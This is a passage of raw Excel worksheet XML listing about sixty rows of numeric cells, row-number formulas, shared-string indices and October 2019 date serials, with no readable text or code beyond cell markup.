        <f t="shared" si="222"/>
        <v>14244</v>
      </c>
      <c r="B14245">
        <v>4244</v>
      </c>
      <c r="C14245" t="s">
        <v>19637</v>
      </c>
      <c r="D14245" s="1">
        <v>43741</v>
      </c>
      <c r="E14245" t="s">
        <v>20882</v>
      </c>
      <c r="F14245" t="s">
        <v>10021</v>
      </c>
      <c r="G14245" t="s">
        <v>24670</v>
      </c>
    </row>
    <row r="14246" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14246">
        <f t="shared" si="222"/>
        <v>14245</v>
      </c>
      <c r="B14246">
        <v>4245</v>
      </c>
      <c r="C14246" t="s">
        <v>19637</v>
      </c>
      <c r="D14246" s="1">
        <v>43756</v>
      </c>
      <c r="E14246" t="s">
        <v>19663</v>
      </c>
      <c r="F14246" t="s">
        <v>9975</v>
      </c>
      <c r="G14246" t="s">
        <v>24671</v>
      </c>
    </row>
    <row r="14247" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14247">
        <f t="shared" si="222"/>
        <v>14246</v>
      </c>
      <c r="B14247">
        <v>4246</v>
      </c>
      <c r="C14247" t="s">
        <v>19637</v>
      </c>
      <c r="D14247" s="1">
        <v>43744</v>
      </c>
      <c r="E14247" t="s">
        <v>19680</v>
      </c>
      <c r="F14247" t="s">
        <v>10021</v>
      </c>
      <c r="G14247" t="s">
        <v>24672</v>
      </c>
    </row>
    <row r="14248" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14248">
        <f t="shared" si="222"/>
        <v>14247</v>
      </c>
      <c r="B14248">
        <v>4247</v>
      </c>
      <c r="C14248" t="s">
        <v>19637</v>
      </c>
      <c r="D14248" s="1">
        <v>43741</v>
      </c>
      <c r="F14248" t="s">
        <v>10526</v>
      </c>
      <c r="G14248" t="s">
        <v>24673</v>
      </c>
    </row>
    <row r="14249" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14249">
        <f t="shared" si="222"/>
        <v>14248</v>
      </c>
      <c r="B14249">
        <v>4248</v>
      </c>
      <c r="C14249" t="s">
        <v>19637</v>
      </c>
      <c r="D14249" s="1">
        <v>43753</v>
      </c>
      <c r="E14249" t="s">
        <v>20458</v>
      </c>
      <c r="F14249" t="s">
        <v>9978</v>
      </c>
      <c r="G14249" t="s">
        <v>24674</v>
      </c>
    </row>
    <row r="14250" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14250">
        <f t="shared" si="222"/>
        <v>14249</v>
      </c>
      <c r="B14250">
        <v>4249</v>
      </c>
      <c r="C14250" t="s">
        <v>19637</v>
      </c>
      <c r="D14250" s="1">
        <v>43756</v>
      </c>
      <c r="E14250" t="s">
        <v>20024</v>
      </c>
      <c r="F14250" t="s">
        <v>10526</v>
      </c>
      <c r="G14250" t="s">
        <v>24675</v>
      </c>
    </row>
    <row r="14251" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14251">
        <f t="shared" si="222"/>
        <v>14250</v>
      </c>
      <c r="B14251">
        <v>4250</v>
      </c>
      <c r="C14251" t="s">
        <v>19637</v>
      </c>
      <c r="D14251" s="1">
        <v>43756</v>
      </c>
      <c r="E14251" t="s">
        <v>24676</v>
      </c>
      <c r="F14251" t="s">
        <v>10526</v>
      </c>
      <c r="G14251" t="s">
        <v>24677</v>
      </c>
    </row>
    <row r="14252" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14252">
        <f t="shared" si="222"/>
        <v>14251</v>
      </c>
      <c r="B14252">
        <v>4251</v>
      </c>
      <c r="C14252" t="s">
        <v>19637</v>
      </c>
      <c r="D14252" s="1">
        <v>43742</v>
      </c>
      <c r="E14252" t="s">
        <v>19640</v>
      </c>
      <c r="F14252" t="s">
        <v>9975</v>
      </c>
      <c r="G14252" t="s">
        <v>24678</v>
      </c>
    </row>
    <row r="14253" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14253">
        <f t="shared" si="222"/>
        <v>14252</v>
      </c>
      <c r="B14253">
        <v>4252</v>
      </c>
      <c r="C14253" t="s">
        <v>19637</v>
      </c>
      <c r="D14253" s="1">
        <v>43753</v>
      </c>
      <c r="E14253" t="s">
        <v>19663</v>
      </c>
      <c r="F14253" t="s">
        <v>9975</v>
      </c>
      <c r="G14253" t="s">
        <v>24679</v>
      </c>
    </row>
    <row r="14254" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14254">
        <f t="shared" si="222"/>
        <v>14253</v>
      </c>
      <c r="B14254">
        <v>4253</v>
      </c>
      <c r="C14254" t="s">
        <v>19637</v>
      </c>
      <c r="D14254" s="1">
        <v>43744</v>
      </c>
      <c r="E14254" t="s">
        <v>24680</v>
      </c>
      <c r="F14254" t="s">
        <v>10526</v>
      </c>
      <c r="G14254" t="s">
        <v>24681</v>
      </c>
    </row>
    <row r="14255" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14255">
        <f t="shared" si="222"/>
        <v>14254</v>
      </c>
      <c r="B14255">
        <v>4254</v>
      </c>
      <c r="C14255" t="s">
        <v>19637</v>
      </c>
      <c r="D14255" s="1">
        <v>43754</v>
      </c>
      <c r="E14255" t="s">
        <v>24682</v>
      </c>
      <c r="F14255" t="s">
        <v>10526</v>
      </c>
      <c r="G14255" t="s">
        <v>24683</v>
      </c>
    </row>
    <row r="14256" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14256">
        <f t="shared" si="222"/>
        <v>14255</v>
      </c>
      <c r="B14256">
        <v>4255</v>
      </c>
      <c r="C14256" t="s">
        <v>19637</v>
      </c>
      <c r="D14256" s="1">
        <v>43749</v>
      </c>
      <c r="F14256" t="s">
        <v>10526</v>
      </c>
      <c r="G14256" t="s">
        <v>24684</v>
      </c>
    </row>
    <row r="14257" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14257">
        <f t="shared" si="222"/>
        <v>14256</v>
      </c>
      <c r="B14257">
        <v>4256</v>
      </c>
      <c r="C14257" t="s">
        <v>19637</v>
      </c>
      <c r="D14257" s="1">
        <v>43739</v>
      </c>
      <c r="E14257" t="s">
        <v>19640</v>
      </c>
      <c r="F14257" t="s">
        <v>9975</v>
      </c>
      <c r="G14257" t="s">
        <v>24685</v>
      </c>
    </row>
    <row r="14258" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14258">
        <f t="shared" si="222"/>
        <v>14257</v>
      </c>
      <c r="B14258">
        <v>4257</v>
      </c>
      <c r="C14258" t="s">
        <v>19637</v>
      </c>
      <c r="D14258" s="1">
        <v>43744</v>
      </c>
      <c r="E14258" t="s">
        <v>19640</v>
      </c>
      <c r="F14258" t="s">
        <v>10021</v>
      </c>
      <c r="G14258" t="s">
        <v>24686</v>
      </c>
    </row>
    <row r="14259" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14259">
        <f t="shared" si="222"/>
        <v>14258</v>
      </c>
      <c r="B14259">
        <v>4258</v>
      </c>
      <c r="C14259" t="s">
        <v>19637</v>
      </c>
      <c r="D14259" s="1">
        <v>43740</v>
      </c>
      <c r="F14259" t="s">
        <v>10526</v>
      </c>
      <c r="G14259" t="s">
        <v>24687</v>
      </c>
    </row>
    <row r="14260" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14260">
        <f t="shared" si="222"/>
        <v>14259</v>
      </c>
      <c r="B14260">
        <v>4259</v>
      </c>
      <c r="C14260" t="s">
        <v>19637</v>
      </c>
      <c r="D14260" s="1">
        <v>43743</v>
      </c>
      <c r="E14260" t="s">
        <v>19896</v>
      </c>
      <c r="F14260" t="s">
        <v>10021</v>
      </c>
      <c r="G14260" t="s">
        <v>24688</v>
      </c>
    </row>
    <row r="14261" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14261">
        <f t="shared" si="222"/>
        <v>14260</v>
      </c>
      <c r="B14261">
        <v>4260</v>
      </c>
      <c r="C14261" t="s">
        <v>19637</v>
      </c>
      <c r="D14261" s="1">
        <v>43749</v>
      </c>
      <c r="F14261" t="s">
        <v>10526</v>
      </c>
      <c r="G14261" t="s">
        <v>24689</v>
      </c>
    </row>
    <row r="14262" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14262">
        <f t="shared" si="222"/>
        <v>14261</v>
      </c>
      <c r="B14262">
        <v>4261</v>
      </c>
      <c r="C14262" t="s">
        <v>19637</v>
      </c>
      <c r="D14262" s="1">
        <v>43740</v>
      </c>
      <c r="E14262" t="s">
        <v>19902</v>
      </c>
      <c r="F14262" t="s">
        <v>9975</v>
      </c>
      <c r="G14262" t="s">
        <v>24690</v>
      </c>
    </row>
    <row r="14263" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14263">
        <f t="shared" si="222"/>
        <v>14262</v>
      </c>
      <c r="B14263">
        <v>4262</v>
      </c>
      <c r="C14263" t="s">
        <v>19637</v>
      </c>
      <c r="D14263" s="1">
        <v>43741</v>
      </c>
      <c r="E14263" t="s">
        <v>19902</v>
      </c>
      <c r="F14263" t="s">
        <v>9975</v>
      </c>
      <c r="G14263" t="s">
        <v>24691</v>
      </c>
    </row>
    <row r="14264" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14264">
        <f t="shared" si="222"/>
        <v>14263</v>
      </c>
      <c r="B14264">
        <v>4263</v>
      </c>
      <c r="C14264" t="s">
        <v>19637</v>
      </c>
      <c r="D14264" s="1">
        <v>43752</v>
      </c>
      <c r="E14264" t="s">
        <v>24692</v>
      </c>
      <c r="F14264" t="s">
        <v>10526</v>
      </c>
      <c r="G14264" t="s">
        <v>24693</v>
      </c>
    </row>
    <row r="14265" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14265">
        <f t="shared" si="222"/>
        <v>14264</v>
      </c>
      <c r="B14265">
        <v>4264</v>
      </c>
      <c r="C14265" t="s">
        <v>19637</v>
      </c>
      <c r="D14265" s="1">
        <v>43748</v>
      </c>
      <c r="E14265" t="s">
        <v>19750</v>
      </c>
      <c r="F14265" t="s">
        <v>9978</v>
      </c>
      <c r="G14265" t="s">
        <v>24694</v>
      </c>
    </row>
    <row r="14266" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14266">
        <f t="shared" si="222"/>
        <v>14265</v>
      </c>
      <c r="B14266">
        <v>4265</v>
      </c>
      <c r="C14266" t="s">
        <v>19637</v>
      </c>
      <c r="D14266" s="1">
        <v>43757</v>
      </c>
      <c r="E14266" t="s">
        <v>19643</v>
      </c>
      <c r="F14266" t="s">
        <v>10021</v>
      </c>
      <c r="G14266" t="s">
        <v>24695</v>
      </c>
    </row>
    <row r="14267" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14267">
        <f t="shared" si="222"/>
        <v>14266</v>
      </c>
      <c r="B14267">
        <v>4266</v>
      </c>
      <c r="C14267" t="s">
        <v>19637</v>
      </c>
      <c r="D14267" s="1">
        <v>43750</v>
      </c>
      <c r="E14267" t="s">
        <v>19687</v>
      </c>
      <c r="F14267" t="s">
        <v>10021</v>
      </c>
      <c r="G14267" t="s">
        <v>24696</v>
      </c>
    </row>
    <row r="14268" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14268">
        <f t="shared" si="222"/>
        <v>14267</v>
      </c>
      <c r="B14268">
        <v>4267</v>
      </c>
      <c r="C14268" t="s">
        <v>19637</v>
      </c>
      <c r="D14268" s="1">
        <v>43745</v>
      </c>
      <c r="F14268" t="s">
        <v>10526</v>
      </c>
      <c r="G14268" t="s">
        <v>24697</v>
      </c>
    </row>
    <row r="14269" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14269">
        <f t="shared" si="222"/>
        <v>14268</v>
      </c>
      <c r="B14269">
        <v>4268</v>
      </c>
      <c r="C14269" t="s">
        <v>19637</v>
      </c>
      <c r="D14269" s="1">
        <v>43748</v>
      </c>
      <c r="E14269" t="s">
        <v>24698</v>
      </c>
      <c r="F14269" t="s">
        <v>10526</v>
      </c>
      <c r="G14269" t="s">
        <v>24699</v>
      </c>
    </row>
    <row r="14270" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14270">
        <f t="shared" si="222"/>
        <v>14269</v>
      </c>
      <c r="B14270">
        <v>4269</v>
      </c>
      <c r="C14270" t="s">
        <v>19637</v>
      </c>
      <c r="D14270" s="1">
        <v>43741</v>
      </c>
      <c r="E14270" t="s">
        <v>20757</v>
      </c>
      <c r="F14270" t="s">
        <v>9978</v>
      </c>
      <c r="G14270" t="s">
        <v>24700</v>
      </c>
    </row>
    <row r="14271" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14271">
        <f t="shared" si="222"/>
        <v>14270</v>
      </c>
      <c r="B14271">
        <v>4270</v>
      </c>
      <c r="C14271" t="s">
        <v>19637</v>
      </c>
      <c r="D14271" s="1">
        <v>43741</v>
      </c>
      <c r="E14271" t="s">
        <v>20813</v>
      </c>
      <c r="F14271" t="s">
        <v>10526</v>
      </c>
      <c r="G14271" t="s">
        <v>24701</v>
      </c>
    </row>
    <row r="14272" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14272">
        <f t="shared" si="222"/>
        <v>14271</v>
      </c>
      <c r="B14272">
        <v>4271</v>
      </c>
      <c r="C14272" t="s">
        <v>19637</v>
      </c>
      <c r="D14272" s="1">
        <v>43744</v>
      </c>
      <c r="E14272" t="s">
        <v>19650</v>
      </c>
      <c r="F14272" t="s">
        <v>10021</v>
      </c>
      <c r="G14272" t="s">
        <v>24702</v>
      </c>
    </row>
    <row r="14273" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14273">
        <f t="shared" si="222"/>
        <v>14272</v>
      </c>
      <c r="B14273">
        <v>4272</v>
      </c>
      <c r="C14273" t="s">
        <v>19637</v>
      </c>
      <c r="D14273" s="1">
        <v>43753</v>
      </c>
      <c r="E14273" t="s">
        <v>19776</v>
      </c>
      <c r="F14273" t="s">
        <v>10021</v>
      </c>
      <c r="G14273" t="s">
        <v>24703</v>
      </c>
    </row>
    <row r="14274" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14274">
        <f t="shared" si="222"/>
        <v>14273</v>
      </c>
      <c r="B14274">
        <v>4273</v>
      </c>
      <c r="C14274" t="s">
        <v>19637</v>
      </c>
      <c r="D14274" s="1">
        <v>43757</v>
      </c>
      <c r="E14274" t="s">
        <v>19849</v>
      </c>
      <c r="F14274" t="s">
        <v>10021</v>
      </c>
      <c r="G14274" t="s">
        <v>24704</v>
      </c>
    </row>
    <row r="14275" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14275">
        <f t="shared" ref="A14275:A14338" si="223">+ROW(A14274)</f>
        <v>14274</v>
      </c>
      <c r="B14275">
        <v>4274</v>
      </c>
      <c r="C14275" t="s">
        <v>19637</v>
      </c>
      <c r="D14275" s="1">
        <v>43739</v>
      </c>
      <c r="E14275" t="s">
        <v>22909</v>
      </c>
      <c r="F14275" t="s">
        <v>10021</v>
      </c>
      <c r="G14275" t="s">
        <v>24705</v>
      </c>
    </row>
    <row r="14276" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14276">
        <f t="shared" si="223"/>
        <v>14275</v>
      </c>
      <c r="B14276">
        <v>4275</v>
      </c>
      <c r="C14276" t="s">
        <v>19637</v>
      </c>
      <c r="D14276" s="1">
        <v>43753</v>
      </c>
      <c r="E14276" t="s">
        <v>24180</v>
      </c>
      <c r="F14276" t="s">
        <v>10021</v>
      </c>
      <c r="G14276" t="s">
        <v>24706</v>
      </c>
    </row>
    <row r="14277" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14277">
        <f t="shared" si="223"/>
        <v>14276</v>
      </c>
      <c r="B14277">
        <v>4276</v>
      </c>
      <c r="C14277" t="s">
        <v>19637</v>
      </c>
      <c r="D14277" s="1">
        <v>43755</v>
      </c>
      <c r="F14277" t="s">
        <v>10526</v>
      </c>
      <c r="G14277" t="s">
        <v>24707</v>
      </c>
    </row>
    <row r="14278" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14278">
        <f t="shared" si="223"/>
        <v>14277</v>
      </c>
      <c r="B14278">
        <v>4277</v>
      </c>
      <c r="C14278" t="s">
        <v>19637</v>
      </c>
      <c r="D14278" s="1">
        <v>43749</v>
      </c>
      <c r="F14278" t="s">
        <v>10526</v>
      </c>
      <c r="G14278" t="s">
        <v>24708</v>
      </c>
    </row>
    <row r="14279" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14279">
        <f t="shared" si="223"/>
        <v>14278</v>
      </c>
      <c r="B14279">
        <v>4278</v>
      </c>
      <c r="C14279" t="s">
        <v>19637</v>
      </c>
      <c r="D14279" s="1">
        <v>43746</v>
      </c>
      <c r="E14279" t="s">
        <v>24709</v>
      </c>
      <c r="F14279" t="s">
        <v>10526</v>
      </c>
      <c r="G14279" t="s">
        <v>24710</v>
      </c>
    </row>
    <row r="14280" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14280">
        <f t="shared" si="223"/>
        <v>14279</v>
      </c>
      <c r="B14280">
        <v>4279</v>
      </c>
      <c r="C14280" t="s">
        <v>19637</v>
      </c>
      <c r="D14280" s="1">
        <v>43757</v>
      </c>
      <c r="E14280" t="s">
        <v>19640</v>
      </c>
      <c r="F14280" t="s">
        <v>10526</v>
      </c>
      <c r="G14280" t="s">
        <v>24711</v>
      </c>
    </row>
    <row r="14281" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14281">
        <f t="shared" si="223"/>
        <v>14280</v>
      </c>
      <c r="B14281">
        <v>4280</v>
      </c>
      <c r="C14281" t="s">
        <v>19637</v>
      </c>
      <c r="D14281" s="1">
        <v>43749</v>
      </c>
      <c r="E14281" t="s">
        <v>21678</v>
      </c>
      <c r="F14281" t="s">
        <v>9975</v>
      </c>
      <c r="G14281" t="s">
        <v>24712</v>
      </c>
    </row>
    <row r="14282" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14282">
        <f t="shared" si="223"/>
        <v>14281</v>
      </c>
      <c r="B14282">
        <v>4281</v>
      </c>
      <c r="C14282" t="s">
        <v>19637</v>
      </c>
      <c r="D14282" s="1">
        <v>43741</v>
      </c>
      <c r="E14282" t="s">
        <v>19640</v>
      </c>
      <c r="F14282" t="s">
        <v>9975</v>
      </c>
      <c r="G14282" t="s">
        <v>24713</v>
      </c>
    </row>
    <row r="14283" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14283">
        <f t="shared" si="223"/>
        <v>14282</v>
      </c>
      <c r="B14283">
        <v>4282</v>
      </c>
      <c r="C14283" t="s">
        <v>19637</v>
      </c>
      <c r="D14283" s="1">
        <v>43746</v>
      </c>
      <c r="E14283" t="s">
        <v>19643</v>
      </c>
      <c r="F14283" t="s">
        <v>10021</v>
      </c>
      <c r="G14283" t="s">
        <v>24714</v>
      </c>
    </row>
    <row r="14284" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14284">
        <f t="shared" si="223"/>
        <v>14283</v>
      </c>
      <c r="B14284">
        <v>4283</v>
      </c>
      <c r="C14284" t="s">
        <v>19637</v>
      </c>
      <c r="D14284" s="1">
        <v>43740</v>
      </c>
      <c r="E14284" t="s">
        <v>20312</v>
      </c>
      <c r="F14284" t="s">
        <v>10526</v>
      </c>
      <c r="G14284" t="s">
        <v>24715</v>
      </c>
    </row>
    <row r="14285" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14285">
        <f t="shared" si="223"/>
        <v>14284</v>
      </c>
      <c r="B14285">
        <v>4284</v>
      </c>
      <c r="C14285" t="s">
        <v>19637</v>
      </c>
      <c r="D14285" s="1">
        <v>43740</v>
      </c>
      <c r="E14285" t="s">
        <v>19680</v>
      </c>
      <c r="F14285" t="s">
        <v>10021</v>
      </c>
      <c r="G14285" t="s">
        <v>24716</v>
      </c>
    </row>
    <row r="14286" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14286">
        <f t="shared" si="223"/>
        <v>14285</v>
      </c>
      <c r="B14286">
        <v>4285</v>
      </c>
      <c r="C14286" t="s">
        <v>19637</v>
      </c>
      <c r="D14286" s="1">
        <v>43748</v>
      </c>
      <c r="E14286" t="s">
        <v>19680</v>
      </c>
      <c r="F14286" t="s">
        <v>10021</v>
      </c>
      <c r="G14286" t="s">
        <v>24717</v>
      </c>
    </row>
    <row r="14287" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14287">
        <f t="shared" si="223"/>
        <v>14286</v>
      </c>
      <c r="B14287">
        <v>4286</v>
      </c>
      <c r="C14287" t="s">
        <v>19637</v>
      </c>
      <c r="D14287" s="1">
        <v>43756</v>
      </c>
      <c r="E14287" t="s">
        <v>19687</v>
      </c>
      <c r="F14287" t="s">
        <v>10021</v>
      </c>
      <c r="G14287" t="s">
        <v>24718</v>
      </c>
    </row>
    <row r="14288" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14288">
        <f t="shared" si="223"/>
        <v>14287</v>
      </c>
      <c r="B14288">
        <v>4287</v>
      </c>
      <c r="C14288" t="s">
        <v>19637</v>
      </c>
      <c r="D14288" s="1">
        <v>43753</v>
      </c>
      <c r="E14288" t="s">
        <v>20512</v>
      </c>
      <c r="F14288" t="s">
        <v>10526</v>
      </c>
      <c r="G14288" t="s">
        <v>24719</v>
      </c>
    </row>
    <row r="14289" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14289">
        <f t="shared" si="223"/>
        <v>14288</v>
      </c>
      <c r="B14289">
        <v>4288</v>
      </c>
      <c r="C14289" t="s">
        <v>19637</v>
      </c>
      <c r="D14289" s="1">
        <v>43750</v>
      </c>
      <c r="E14289" t="s">
        <v>19643</v>
      </c>
      <c r="F14289" t="s">
        <v>10021</v>
      </c>
      <c r="G14289" t="s">
        <v>24720</v>
      </c>
    </row>
    <row r="14290" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14290">
        <f t="shared" si="223"/>
        <v>14289</v>
      </c>
      <c r="B14290">
        <v>4289</v>
      </c>
      <c r="C14290" t="s">
        <v>19637</v>
      </c>
      <c r="D14290" s="1">
        <v>43749</v>
      </c>
      <c r="E14290" t="s">
        <v>19690</v>
      </c>
      <c r="F14290" t="s">
        <v>9978</v>
      </c>
      <c r="G14290" t="s">
        <v>24721</v>
      </c>
    </row>
    <row r="14291" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14291">
        <f t="shared" si="223"/>
        <v>14290</v>
      </c>
      <c r="B14291">
        <v>4290</v>
      </c>
      <c r="C14291" t="s">
        <v>19637</v>
      </c>
      <c r="D14291" s="1">
        <v>43748</v>
      </c>
      <c r="E14291" t="s">
        <v>24722</v>
      </c>
      <c r="F14291" t="s">
        <v>10021</v>
      </c>
      <c r="G14291" t="s">
        <v>24723</v>
      </c>
    </row>
    <row r="14292" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14292">
        <f t="shared" si="223"/>
        <v>14291</v>
      </c>
      <c r="B14292">
        <v>4291</v>
      </c>
      <c r="C14292" t="s">
        <v>19637</v>
      </c>
      <c r="D14292" s="1">
        <v>43749</v>
      </c>
      <c r="E14292" t="s">
        <v>19640</v>
      </c>
      <c r="F14292" t="s">
        <v>9975</v>
      </c>
      <c r="G14292" t="s">
        <v>24724</v>
      </c>
    </row>
    <row r="14293" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14293">
        <f t="shared" si="223"/>
        <v>14292</v>
      </c>
      <c r="B14293">
        <v>4292</v>
      </c>
      <c r="C14293" t="s">
        <v>19637</v>
      </c>
      <c r="D14293" s="1">
        <v>43745</v>
      </c>
      <c r="E14293" t="s">
        <v>24725</v>
      </c>
      <c r="F14293" t="s">
        <v>10526</v>
      </c>
      <c r="G14293" t="s">
        <v>24726</v>
      </c>
    </row>
    <row r="14294" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14294">
        <f t="shared" si="223"/>
        <v>14293</v>
      </c>
      <c r="B14294">
        <v>4293</v>
      </c>
      <c r="C14294" t="s">
        <v>19637</v>
      </c>
      <c r="D14294" s="1">
        <v>43750</v>
      </c>
      <c r="E14294" t="s">
        <v>19640</v>
      </c>
      <c r="F14294" t="s">
        <v>9975</v>
      </c>
      <c r="G14294" t="s">
        <v>24727</v>
      </c>
    </row>
    <row r="14295" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14295">
        <f t="shared" si="223"/>
        <v>14294</v>
      </c>
      <c r="B14295">
        <v>4294</v>
      </c>
      <c r="C14295" t="s">
        <v>19637</v>
      </c>
      <c r="D14295" s="1">
        <v>43744</v>
      </c>
      <c r="E14295" t="s">
        <v>20977</v>
      </c>
      <c r="F14295" t="s">
        <v>9978</v>
      </c>
      <c r="G14295" t="s">
        <v>24728</v>
      </c>
    </row>
    <row r="14296" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14296">
        <f t="shared" si="223"/>
        <v>14295</v>
      </c>
      <c r="B14296">
        <v>4295</v>
      </c>
      <c r="C14296" t="s">
        <v>19637</v>
      </c>
      <c r="D14296" s="1">
        <v>43741</v>
      </c>
      <c r="E14296" t="s">
        <v>19640</v>
      </c>
      <c r="F14296" t="s">
        <v>9975</v>
      </c>
      <c r="G14296" t="s">
        <v>24729</v>
      </c>
    </row>
    <row r="14297" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14297">
        <f t="shared" si="223"/>
        <v>14296</v>
      </c>
      <c r="B14297">
        <v>4296</v>
      </c>
      <c r="C14297" t="s">
        <v>19637</v>
      </c>
      <c r="D14297" s="1">
        <v>43756</v>
      </c>
      <c r="E14297" t="s">
        <v>19705</v>
      </c>
      <c r="F14297" t="s">
        <v>10021</v>
      </c>
      <c r="G14297" t="s">
        <v>24730</v>
      </c>
    </row>
    <row r="14298" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14298">
        <f t="shared" si="223"/>
        <v>14297</v>
      </c>
      <c r="B14298">
        <v>4297</v>
      </c>
      <c r="C14298" t="s">
        <v>19637</v>
      </c>
      <c r="D14298" s="1">
        <v>43748</v>
      </c>
      <c r="E14298" t="s">
        <v>24731</v>
      </c>
      <c r="F14298" t="s">
        <v>10526</v>
      </c>
      <c r="G14298" t="s">
        <v>24732</v>
      </c>
    </row>
    <row r="14299" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14299">
        <f t="shared" si="223"/>
        <v>14298</v>
      </c>
      <c r="B14299">
        <v>4298</v>
      </c>
      <c r="C14299" t="s">
        <v>19637</v>
      </c>
      <c r="D14299" s="1">
        <v>43743</v>
      </c>
      <c r="E14299" t="s">
        <v>19680</v>
      </c>
      <c r="F14299" t="s">
        <v>10021</v>
      </c>
      <c r="G14299" t="s">
        <v>24733</v>
      </c>
    </row>
    <row r="14300" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14300">
        <f t="shared" si="223"/>
        <v>14299</v>
      </c>
      <c r="B14300">
        <v>4299</v>
      </c>
      <c r="C14300" t="s">
        <v>19637</v>
      </c>
      <c r="D14300" s="1">
        <v>43754</v>
      </c>
      <c r="E14300" t="s">
        <v>19640</v>
      </c>
      <c r="F14300" t="s">
        <v>10021</v>
      </c>
      <c r="G14300" t="s">
        <v>24734</v>
      </c>
    </row>
    <row r="14301" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14301">
        <f t="shared" si="223"/>
        <v>14300</v>
      </c>
      <c r="B14301">
        <v>4300</v>
      </c>
      <c r="C14301" t="s">
        <v>19637</v>
      </c>
      <c r="D14301" s="1">
        <v>43750</v>
      </c>
      <c r="E14301" t="s">
        <v>19643</v>
      </c>
      <c r="F14301" t="s">
        <v>10021</v>
      </c>
      <c r="G14301" t="s">
        <v>24735</v>
      </c>
    </row>
    <row r="14302" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14302">
        <f t="shared" si="223"/>
        <v>14301</v>
      </c>
      <c r="B14302">
        <v>4301</v>
      </c>
      <c r="C14302" t="s">
        <v>19637</v>
      </c>
      <c r="D14302" s="1">
        <v>43745</v>
      </c>
      <c r="E14302" t="s">
        <v>24736</v>
      </c>
      <c r="F14302" t="s">
        <v>10526</v>
      </c>
      <c r="G14302" t="s">
        <v>24737</v>
      </c>
    </row>
    <row r="14303" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14303">
        <f t="shared" si="223"/>
        <v>14302</v>
      </c>
      <c r="B14303">
        <v>4302</v>
      </c>
      <c r="C14303" t="s">
        <v>19637</v>
      </c>
      <c r="D14303" s="1">
        <v>43750</v>
      </c>
      <c r="E14303" t="s">
        <v>19650</v>
      </c>
      <c r="F14303" t="s">
        <v>10021</v>
      </c>
      <c r="G14303" t="s">
        <v>24738</v>
      </c>
    </row>
    <row r="14304" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14304">
        <f t="shared" si="223"/>
        <v>14303</v>
      </c>
      <c r="B14304">
        <v>4303</v>
      </c>
      <c r="C14304" t="s">
        <v>19637</v>
      </c>
      <c r="D14304" s="1">
        <v>43743</v>
      </c>
      <c r="E14304" t="s">
        <v>19680</v>
      </c>
      <c r="F14304" t="s">
        <v>10021</v>
      </c>
      <c r="G14304" t="s">
        <v>24739</v>
      </c>
    </row>
    <row r="14305" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14305">
        <f t="shared" si="223"/>
        <v>14304</v>
      </c>
      <c r="B14305">
        <v>4304</v>
      </c>
      <c r="C14305" t="s">
        <v>19637</v>
      </c>
      <c r="D14305" s="1">
        <v>43753</v>
      </c>
      <c r="F14305" t="s">
        <v>10526</v>
      </c>
      <c r="G14305" t="s">
        <v>24624</v>
      </c>
    </row>
    <row r="14306" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14306">
        <f t="shared" si="223"/>
        <v>14305</v>
      </c>
      <c r="B14306">
        <v>4305</v>
      </c>
      <c r="C14306" t="s">
        <v>19637</v>
      </c>
      <c r="D14306" s="1">
        <v>43739</v>
      </c>
      <c r="E14306" t="s">
        <v>20228</v>
      </c>
      <c r="F14306" t="s">
        <v>10021</v>
      </c>
      <c r="G14306" t="s">
        <v>24740</v>
      </c>
    </row>
